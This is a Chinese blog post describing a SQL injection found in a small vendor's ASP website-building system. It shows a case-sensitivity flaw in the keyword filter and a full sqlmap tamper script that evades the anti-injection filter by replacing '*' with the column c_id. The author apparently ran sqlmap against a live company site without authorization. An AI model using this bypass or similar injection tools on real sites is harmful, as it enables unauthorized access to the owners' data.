一个有意思的某通用建站系统SQL注入漏洞

有朋友买了个跑步机,然后感觉被坑了,然后我顺便看了一下官网,居然发现了一个很有意思的注入漏洞。网站使用是某地方小开发商自己开发的通用建站系统,报到乌云啥的也不收啊,所以就发这了吧。首先找到一个动态页面,试了一下:

关键字过滤

看来也是有过滤的哈,不过看到asp我就知道肯定弱爆了,试了一下,果然,连大小写都没考虑,搞毛。

绕过防注入系统

实在是蛋碎,丢进sqlmap,发现详细信息跑不出来,原来是防注入系统过滤了*号,简直是蛋碎一地,注入中的某个“Select * ”语句被检测到了,不过还好sqlmap支持tamper,也就是自定义模板对注入语句进行处理,写了一下,把*替换成了已知字段c_id,搞定。

#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replace keyword by pass waf

    >>> tamper("count(*)")
    'count(c_id)'
    """

    return payload.replace("*","c_id") if payload else payload

 

本文标题:一个有意思的某通用建站系统SQL注入漏洞
本文链接:https://www.nigesb.com/an-interesting-sqli.html
订阅本站:http://www.nigesb.com/feed
转载请注明来源,如果喜欢本站可以Feed订阅本站。

发表评论?

2 条评论。

  1. 朱海涛自媒体

    有什么危害呢

  2. 哈哈。这个漏洞肯定不会收。乌云是收很大型的

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>